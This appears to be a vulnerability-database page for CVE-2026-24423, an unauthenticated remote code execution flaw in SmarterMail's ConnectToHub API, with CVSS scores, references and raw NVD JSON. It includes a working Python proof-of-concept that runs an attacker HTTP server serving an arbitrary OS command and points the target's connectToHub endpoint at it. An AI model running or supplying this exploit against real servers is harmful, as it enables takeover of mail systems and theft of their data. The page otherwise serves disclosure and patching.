Security Vulnerability Report
CVE-2026-24423 CVSS 9.8 CRITICAL

CVE-2026-24423

Published: 2026-01-23 17:16:13
Last Modified: 2026-02-06 16:45:15

Description

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. An attacker can point SmarterMail at a malicious HTTP server that serves an OS command, which the vulnerable application then executes.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:* - VULNERABLE
SmarterMail < build 9511

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2026-24423 PoC - SmarterMail ConnectToHub Unauthenticated RCE
# Note: This PoC is for educational and authorized testing purposes only

import http.server
import socketserver
import threading
import requests
import sys


class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Send malicious response with OS command
        # Modify 'whoami' to any desired command
        malicious_response = "whoami"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(malicious_response.encode())

    def log_message(self, format, *args):
        pass  # Suppress logging


def start_malicious_server(port=8080):
    with socketserver.TCPServer(("", port), MaliciousHandler) as httpd:
        httpd.handle_request()  # Handle single request


def exploit_target(target_url, attacker_ip, attacker_port=8080):
    # Start malicious HTTP server in background thread
    server_thread = threading.Thread(target=start_malicious_server, args=(attacker_port,))
    server_thread.daemon = True
    server_thread.start()

    # Construct the malicious request to ConnectToHub API
    # The target SmarterMail server will connect back to our server
    endpoint = f"{target_url}/api/v1/connectToHub"
    payload = {
        "serverAddress": f"http://{attacker_ip}:{attacker_port}"
    }

    try:
        print(f"[*] Sending exploit to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=30)
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Check attacker server for command execution result")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>")
        print(f"Example: {sys.argv[0]} http://target:17001 192.168.1.100 8080")
        sys.exit(1)
    target = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = int(sys.argv[3])
    exploit_target(target, attacker_ip, attacker_port)
```

References

https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail (Third Party Advisory)
https://www.smartertools.com/smartermail/release-notes/current (Release Notes)
https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api (Third Party Advisory)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24423 (US Government Resource)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-24423",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T17:16:13.483",
    "lastModified": "2026-02-06T16:45:15.323",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application."
      },
      {
        "lang": "es",
        "value": "Las versiones de SmarterTools SmarterMail anteriores a la compilación 9511 contienen una vulnerabilidad de ejecución remota de código no autenticada en el método API ConnectToHub. El atacante podría dirigir SmarterMail al servidor HTTP malicioso, que sirve el comando malicioso del sistema operativo. Este comando será ejecutado por la aplicación vulnerable."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "cisaExploitAdd": "2026-02-05",
    "cisaActionDue": "2026-02-26",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability",
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "100.0.9511",
                "matchCriteriaId": "D508C7EA-385D-428C-ACD3-9E2F93F0FB31"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.smartertools.com/smartermail/release-notes/current",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24423",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}
```